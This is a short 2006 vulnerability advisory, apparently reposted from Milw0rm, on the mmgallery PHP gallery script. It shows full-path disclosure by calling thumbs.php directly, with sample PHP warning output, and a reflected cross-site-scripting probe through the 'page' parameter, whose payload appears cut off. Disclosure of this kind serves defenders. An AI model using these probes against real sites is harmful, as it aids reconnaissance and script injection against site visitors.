mmgallery Multiple vulnerabilities

2006.11.27
Risk: Low
Local: No
Remote: Yes
CWE: N/A

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: + + tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: + + tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: + + ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: + + ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: + + ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: + + ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: + + ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. + + ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. + + ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. + + tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. + + jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. + + ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. + + ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. + + iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; + + ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, + + jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, + + jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: + + iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii + + ;;.. ii;; + + .. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++ + + Credit by : Al7ejaz HackerZ mmgallery Multiple vulnerabilities Script : mmgallery Website: mmgallery.net Impact : FullPath disclosure and Cross site Scripting FullPath disclosure in thumbs.php ********************************* when thumbs.php file is called directelly withowth argument this cause fullpath disclosure http://localhost/thumbs.php Result ------------------------------------------------------------------------ Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/photos/functions.inc on line 46 Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 58 Galery :: Title :: Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in /var/www/user/functions.inc on line 99 Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 101 Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112 Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 113 -------------------------------------------- Cross Site Scripting ************************ page varibale is not proprely verified and can be used to execute arbitary htmlcode http://localhost/thumbs.php?page='> Al7ejaz HackerZ ;) /Milw0rm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top